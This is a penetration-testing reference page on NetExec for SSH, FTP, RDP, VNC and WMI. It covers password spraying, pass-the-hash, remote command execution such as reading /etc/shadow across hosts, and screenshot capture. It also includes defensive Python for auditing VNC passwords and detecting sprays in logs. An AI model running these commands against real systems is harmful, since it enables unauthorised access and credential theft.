# SSH / FTP / RDP / VNC / WMI Operations with NetExec

## Overview
Beyond SMB, LDAP, WinRM, and MSSQL, NetExec supports five additional protocols for credential validation and command execution. These protocols are essential for comprehensive internal pentesting coverage — especially in environments with mixed Linux/Windows infrastructure, network devices, and management interfaces.
## SSH (22/TCP)
SSH is the primary remote management protocol for Linux/Unix systems, network devices, and increasingly Windows Server (OpenSSH Server).
### Credential Validation

```bash
# Password authentication
netexec ssh 10.10.10.5 -u root -p 'password'
# [+] → valid credentials
# [-] → invalid

# Key-based authentication: --key-file points at the private key;
# NetExec reads the key's passphrase from -p
netexec ssh 10.10.10.5 -u root -p 'key_passphrase' --key-file /path/to/private_key

# Spray a password list against root across a subnet of Linux hosts
netexec ssh 10.10.10.0/24 -u root -p passwords.txt --continue-on-success

# Non-standard port
netexec ssh 10.10.10.5 -u user -p pass --port 2222
```
### Command Execution

```bash
# Execute a single command
netexec ssh 10.10.10.5 -u root -p pass -x 'id'
# Output: uid=0(root) gid=0(root) groups=0(root)

# Execute on multiple hosts
netexec ssh targets.txt -u root -p pass -x 'cat /etc/shadow'

# Sudo privilege check
netexec ssh 10.10.10.5 -u user -p pass -x 'sudo -l'
# Shows: which commands the user can run with sudo
```
## FTP (21/TCP)
FTP is common on legacy systems, network devices, and some web servers. It's often overlooked but can provide file access and credential validation.
### Credential Validation

```bash
# Standard FTP authentication (here: anonymous login)
netexec ftp 10.10.10.5 -u anonymous -p ''
# [+] → valid credentials
# [-] → invalid

# Spray credentials
netexec ftp 10.10.10.5 -u users.txt -p passwords.txt --continue-on-success

# Non-standard port
netexec ftp 10.10.10.5 -u user -p pass --port 2121
```
### File Operations

The FTP protocol has no `-x`; NetExec exposes directory listing and transfers through dedicated flags.

```bash
# List files in the login directory (pass a path to list another directory)
netexec ftp 10.10.10.5 -u user -p pass --ls

# Download a file
netexec ftp 10.10.10.5 -u user -p pass --get backup.zip
```
## RDP (3389/TCP)
Remote Desktop Protocol is the standard Windows GUI remote access protocol. NetExec can validate credentials and capture screenshots without establishing a full GUI session.
### Credential Validation

```bash
# Validate RDP credentials
netexec rdp 10.10.10.5 -u administrator -p pass
# [+] → valid credentials, RDP accessible
# [-] → invalid credentials or RDP disabled

# Check NLA (Network Level Authentication) status: the host banner NetExec prints
# for every RDP target includes an nla:True/False field, so no credentials are needed
netexec rdp 10.10.10.5
# nla:True  → authentication is required before an RDP session is established
# nla:False → login screen reachable before authentication (rare on modern Windows)

# Spray one password across a subnet
netexec rdp 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
```
### Screenshot Capture

```bash
# Log in with the supplied credentials and capture a screenshot of the resulting desktop
netexec rdp 10.10.10.5 -u user -p pass --screenshot
# Output: PNG screenshot saved under the NetExec home directory (~/.nxc/screenshots)
# Useful for: seeing what the logged-on user is doing

# Wait longer for the desktop to render and set the capture resolution
netexec rdp 10.10.10.5 -u user -p pass --screenshot --screentime 15 --res 1280x720
```
## VNC (5900/TCP)
Virtual Network Computing is common on legacy systems, industrial control systems, and some Linux desktops. Often configured with weak or no passwords.
### Credential Validation

```bash
# Validate VNC credentials
netexec vnc 10.10.10.5 -u '' -p 'password'
# VNC typically uses password-only auth (no username), so -u is left empty

# Spray VNC passwords
netexec vnc 10.10.10.0/24 -u '' -p passwords.txt --continue-on-success

# Capture a screenshot of the framebuffer after a successful login
netexec vnc 10.10.10.5 -u '' -p pass --screenshot
```
## WMI (135/TCP + dynamic ports)
Windows Management Instrumentation provides remote management capabilities. NetExec's WMI protocol support validates credentials and executes commands via WMI.
### Credential Validation

```bash
# Validate WMI credentials
netexec wmi 10.10.10.5 -u administrator -p pass
# [+] → valid credentials with WMI access
# [-] → invalid or WMI blocked

# Domain context
netexec wmi 10.10.10.5 -u user -p pass -d domain.local

# Pass-the-hash
netexec wmi 10.10.10.5 -u administrator -H ':NTHASH'
```
### Command Execution

```bash
# Execute a command via WMI
netexec wmi 10.10.10.5 -u admin -p pass -x 'whoami'
# WMI execution uses the Win32_Process Create method

# Execute on multiple targets
netexec wmi targets.txt -u admin -p pass -x 'systeminfo'
```
## Multi-Protocol Workflow
Combine protocols for comprehensive coverage:

```bash
# Step 1: Validate credentials across all accessible protocols
netexec smb 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success
netexec winrm 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success
netexec ssh 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success

# Step 2: For valid SMB credentials, check WinRM access
netexec winrm 10.10.10.5 -u valid_user -p valid_pass

# Step 3: For Linux targets, check sudo privileges
netexec ssh 10.10.10.5 -u valid_user -p valid_pass -x 'sudo -l'

# Step 4: For RDP-accessible targets, capture screenshots
netexec rdp 10.10.10.5 -u valid_user -p valid_pass --screenshot
```
## Common Pitfalls
- ⚠️ SSH rate limiting: Many Linux hosts run fail2ban or similar, and a burst of failed SSH attempts gets your source IP banned. Use conservative spraying rates.
- ⚠️ FTP cleartext: All FTP traffic (including credentials) is unencrypted. Network IDS may flag FTP authentication attempts.
- ⚠️ RDP NLA: Modern Windows requires NLA by default. You cannot reach the RDP session without valid credentials first.
- ⚠️ VNC password length: VNC passwords are truncated to 8 characters. For a password longer than 8 characters, only the first 8 are needed to authenticate.
- ⚠️ WMI firewall: WMI requires RPC dynamic ports. If only 135/TCP is open, WMI will fail. Use SMB or WinRM as a fallback.
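The VNC pitfall above follows from how RFB "VNC Authentication" builds its DES key. The Python below is an added illustration, not NetExec code or anything from this page: it derives the key the way a VNC server does (first 8 bytes of the password, null-padded, with the bits of each byte mirrored) and shows that any two passwords sharing their first 8 characters are interchangeable. DES itself is not implemented, because the point is that the key is already identical before any encryption happens. The function names and the `latin-1` encoding choice are my own assumptions.

```python
VNC_KEY_LEN = 8  # RFB "VNC Authentication" keys single DES, so exactly 8 bytes are used


def vnc_effective_password(password: str) -> bytes:
    """The bytes VNC authentication actually keys on: the password cut to 8 bytes
    and null-padded to 8. Everything after byte 8 is discarded.
    Encoding as latin-1 is an assumption; real servers take raw bytes."""
    raw = password.encode("latin-1", errors="replace")[:VNC_KEY_LEN]
    return raw.ljust(VNC_KEY_LEN, b"\x00")


def _reverse_bits(byte: int) -> int:
    """VNC feeds each key byte to DES with its bit order mirrored, a quirk of the
    original implementation that compatible servers and clients reproduce."""
    return int(f"{byte:08b}"[::-1], 2)


def vnc_des_key(password: str) -> bytes:
    """DES key derived from a VNC password, as a server would build it."""
    return bytes(_reverse_bits(b) for b in vnc_effective_password(password))


def vnc_passwords_equivalent(a: str, b: str) -> bool:
    """True when two passwords authenticate identically (they yield the same DES key)."""
    return vnc_des_key(a) == vnc_des_key(b)


def audit_vnc_password(password: str) -> dict:
    """Policy check to run over a VNC password inventory: reports the effective
    length and whether the tail beyond 8 characters is silently ignored."""
    effective = vnc_effective_password(password).rstrip(b"\x00")
    return {
        "configured_length": len(password),
        "effective_length": len(effective),
        "truncated": len(password) > VNC_KEY_LEN,
    }


if __name__ == "__main__":
    print(audit_vnc_password("CorrectHorseBatteryStaple"))
    # A 25-character password and its first 8 characters are the same credential
    print(vnc_passwords_equivalent("CorrectHorseBatteryStaple", "CorrectH"))
```

`audit_vnc_password` is the piece a defender would actually keep: anything it reports as truncated offers only the entropy of its first 8 characters, however long the configured value is.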
## OPSEC Considerations
| Protocol | Noise Level | Key Artifacts |
|---|---|---|
| SSH | Low–Medium | SSH auth events, fail2ban logs |
| FTP | Low | FTP service logs (cleartext credentials visible) |
| RDP | Medium | Terminal Services session events, 4625/4624 login events |
| VNC | Low | VNC server logs (rarely monitored) |
| WMI | Medium | WMI activity logs, Win32_Process creation events |
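The artifacts in the table are what a defender correlates to see the multi-protocol workflow above from the other side: one source address failing logons for several different accounts across sshd and Windows 4625 events, then succeeding as one of them. The Python below is an added example, not part of NetExec or of this page. It parses a constructed sshd `auth.log` excerpt and constructed 4624/4625 records into one record shape and raises a single alert per source address that fails logons for at least three distinct accounts within ten minutes, listing any account that later logged on from the same source. The log lines, addresses, thresholds and function names are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth.log excerpt (hosts and addresses are made up).
SSHD_LOG = """\
Jan 12 10:00:01 web01 sshd[1201]: Failed password for invalid user admin from 10.10.10.99 port 51234 ssh2
Jan 12 10:00:02 web01 sshd[1202]: Failed password for root from 10.10.10.99 port 51235 ssh2
Jan 12 10:00:03 web01 sshd[1203]: Failed password for invalid user backup from 10.10.10.99 port 51236 ssh2
Jan 12 10:00:04 web01 sshd[1204]: Failed password for invalid user svc_deploy from 10.10.10.99 port 51237 ssh2
Jan 12 10:00:05 web01 sshd[1205]: Accepted password for jdoe from 10.10.10.99 port 51238 ssh2
Jan 12 10:30:00 web01 sshd[1300]: Failed password for root from 10.10.10.50 port 40000 ssh2
Jan 12 10:30:40 web01 sshd[1301]: Accepted publickey for root from 10.10.10.50 port 40001 ssh2
"""

# Constructed Windows Security events as a SIEM export might present them.
# 4625 = failed logon, 4624 = successful logon; logon type 10 is RemoteInteractive (RDP),
# type 3 is Network (SMB, WMI, WinRM).
WIN_EVENTS = [
    {"ts": "2024-01-12T10:05:00", "event_id": 4625, "user": "alice", "src": "10.10.10.99", "logon_type": 3},
    {"ts": "2024-01-12T10:05:01", "event_id": 4625, "user": "bob", "src": "10.10.10.99", "logon_type": 3},
    {"ts": "2024-01-12T10:05:02", "event_id": 4625, "user": "carol", "src": "10.10.10.99", "logon_type": 10},
    {"ts": "2024-01-12T10:05:03", "event_id": 4624, "user": "jdoe", "src": "10.10.10.99", "logon_type": 10},
    {"ts": "2024-01-12T10:40:00", "event_id": 4625, "user": "jdoe", "src": "10.10.10.50", "logon_type": 10},
]

SSHD_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d+\.\d+\.\d+\.\d+)"
)


def parse_sshd(text, year=2024):
    """Normalise sshd auth lines into {ts, proto, src, user, ok} records.
    syslog timestamps carry no year, so the caller supplies it."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "proto": "ssh", "src": m["src"], "user": m["user"],
                       "ok": m["outcome"] == "Accepted"})
    return events


def parse_windows(records):
    """Normalise 4624/4625 exports into the same record shape as parse_sshd."""
    events = []
    for r in records:
        if r["event_id"] not in (4624, 4625):
            continue
        events.append({"ts": datetime.fromisoformat(r["ts"]),
                       "proto": "rdp" if r["logon_type"] == 10 else "network",
                       "src": r["src"], "user": r["user"], "ok": r["event_id"] == 4624})
    return events


def detect_spray(events, window=timedelta(minutes=10), min_users=3):
    """One alert per source address whose failed logons name at least `min_users`
    distinct accounts inside any `window`. The alert also lists accounts that
    logged on successfully from that source afterwards (the guess that worked)."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        fails = [e for e in evs if not e["ok"]]
        for i, first in enumerate(fails):
            burst = [e for e in fails[i:] if e["ts"] - first["ts"] <= window]
            users = {e["user"] for e in burst}
            if len(users) < min_users:
                continue
            later_ok = {e["user"] for e in evs if e["ok"] and e["ts"] >= first["ts"]}
            alerts.append({"src": src, "first_seen": first["ts"], "distinct_users": len(users),
                           "protocols": sorted({e["proto"] for e in burst}),
                           "success_after": sorted(later_ok)})
            break  # one alert per source is enough; later bursts are the same campaign
    return alerts


def run_sample():
    """Apply the rule to the constructed logs above."""
    return detect_spray(parse_sshd(SSHD_LOG) + parse_windows(WIN_EVENTS))


if __name__ == "__main__":
    for a in run_sample():
        print(f"[spray] {a['src']} from {a['first_seen']:%H:%M:%S}: {a['distinct_users']} accounts "
              f"over {','.join(a['protocols'])}; later success as {a['success_after'] or 'none'}")
```

On the sample data the single failed `root` logon and the single failed RDP logon from 10.10.10.50 stay below the threshold, while 10.10.10.99 trips it across ssh, network and RDP logons and is tagged with the `jdoe` success that followed. Keying on distinct accounts per source rather than on failures per account is what separates a spray from an ordinary lockout, and the cross-protocol merge is what catches a campaign that stays under each service's own rate limit.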
## Post-Exploitation Value
- SSH access → full Linux/Unix remote control, file transfer, tunneling
- FTP access → file exfiltration, configuration discovery
- RDP access → GUI session, detailed Windows enumeration
- VNC access → GUI session, keystroke monitoring potential
- WMI access → Windows remote management, lateral movement
## Cross-References
- SMB Operations — Primary Windows protocol
- WinRM Operations — PowerShell remoting
- Password Spraying — Spraying across all protocols
- Pivoting & Tunneling — Using SSH for tunneling